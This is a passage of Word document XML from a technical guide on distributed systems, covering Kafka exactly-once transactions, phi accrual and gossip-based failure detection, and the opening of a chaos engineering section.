    <w:p w14:paraId="3BB591F0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Producer retries are harmless. Each message appears exactly once in the log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAC65AD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Consumer side — Transactional Processing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C56E3F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="466"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Consumer reads message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58233CE7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="466"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Processes it (e.g., updates a database).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE457D6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="466"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Commits the consumer offset AND the database update in a single atomic transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050A987E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>If step 2 succeeds but step 3 crashes before offset commit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0288D4E5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="467"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Consumer re-reads the message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565C14BB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="467"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>But the database already has the result → use idempotent writes or check before applying.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259424FA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kafka Transactions (combining both sides):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5B4989" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>For stream processing (read from topic A, process, write to topic B):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C20E7E2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="468"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Consumer begins a Kafka transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056C9E26" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="468"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Reads from topic A.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FBD180" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="468"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A0F019" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="468"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Writes result to topic B AND commits the consumer offset — all within the same Kafka transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1627A555" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="468"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If anything fails before commit, everything is rolled back (atomically).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FE74D7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How this works internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D51B9C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="469"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>A transaction coordinator (a special Kafka broker) tracks the transaction state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6790F40B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="469"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>All writes within the transaction are tagged with a transaction ID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEF2D51" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="469"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>Until committed, downstream consumers (with isolation.level=read_committed) don't see the writes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AA5104" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="469"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>On commit: coordinator writes a COMMIT marker → all writes become visible atomically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F3096E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="469"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>On abort: coordinator writes an ABORT marker → all writes are discarded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBD87EB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="41A0EC39">
          <v:rect id="_x0000_i2939" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="28141CBD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10. Failure Detection — Knowing When Something is Wrong</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269F3463" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.1 The Impossibility of Perfect Failure Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A97682" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In an asynchronous network:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34342A13" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>You send a heartbeat to Node B. No response. Is B dead or is the network slow?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503EF45E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="470"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If you declare B dead immediately → false positive (B might be doing GC).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A318F58" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="470"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If you wait longer → delayed detection (if B is actually dead, you're sending traffic to a corpse).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A54EA99" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>There is no timeout value that is always correct.</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> This is a fundamental tradeoff.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B8E24D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.2 Phi Accrual Failure Detector</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCE5B0C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Used by:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Akka, Cassandra.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1087A23F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem with threshold-based detection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E67F7EB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="471"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Fixed timeout (e.g., 10 seconds): too slow for fast networks, too aggressive for slow ones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359ED294" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="471"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Doesn't adapt to network conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29015A4C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How the Phi Accrual Detector works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F1E9FB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="472"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Track the inter-arrival time of heartbeats from each node.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AA09E3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="472"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Maintain a sliding window of recent heartbeat intervals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304A4326" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="472"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>When a heartbeat is expected but hasn't arrived, compute φ (phi):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFEE20C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C32A6A5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>φ = -log10(P(heartbeat_interval &gt; current_delay))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E30024C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>This is: "what's the probability that a healthy node would have this long a gap?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D50F47" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="472"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>φ = 1 means there's a 10% chance this is normal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B7DF67" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="472"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>φ = 3 means there's a 0.1% chance this is normal (almost certainly failed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63022644" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="472"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Application chooses its own threshold (e.g., "declare dead when φ &gt; 8").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6482F338" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why this is better:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB98722" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="473"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Automatically adapts to each node's characteristics and network conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E81EA61" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="473"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>A node with jittery heartbeats (varying intervals) gets a more lenient detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590992EF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="473"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>A node with perfectly regular heartbeats gets aggressive detection (any deviation is suspicious).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F56B2DD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="473"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>No manual timeout tuning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C18B289" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.3 Gossip-Based Failure Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A85FAF9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Used by:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Cassandra, Consul, Serf.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FA0E0F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FA02A2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="474"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Every T seconds, each node randomly picks another node and exchanges state ("gossip").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7943C8A2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="474"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>State includes: "I last heard from Node X at time T1."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3874D4A4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="474"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If all nodes agree they haven't heard from Node X for a threshold period, Node X is marked as failed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750E7B74" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A31637" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="475"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Decentralized — no single failure detector that could itself fail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5698063C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="475"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Scalable — each node communicates with O(log N) others per interval.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213405DD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="475"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Convergence — information propagates to all nodes in O(log N) gossip rounds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D1AF7F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="475"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Tolerant of false suspicion — a node marked dead that's actually alive will gossip back and correct the state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E468E86" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How Cassandra's gossip works internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D6A064" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="476"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Every second, each node gossips with 1-3 randomly selected nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD403F5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="476"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Gossip message contains: heartbeat generation (incremented on restart) + heartbeat version (incremented each second alive).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA88992" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="476"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>If a node's heartbeat version hasn't increased for phi_convict_threshold time → marked DOWN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB28F63" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="476"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>When marked DOWN, other nodes take over its responsibilities (handle its key ranges).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6033B1A3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="55932052">
          <v:rect id="_x0000_i2940" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A32B0E7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11. Chaos Engineering — Proving Reliability Through Controlled Failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B95CF8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.1 The Philosophy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733061C5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The premise:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> You cannot prove a system is reliable by never failing. You prove reliability by deliberately injecting failures and verifying the system handles them correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2223ADF1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why testing isn't enough:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD4B544" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="477"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Unit tests verify code correctness in isolation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743ACCD0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="477"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Integration tests verify component interactions in controlled environments.</w:t>
      </w:r>
    </w:p>
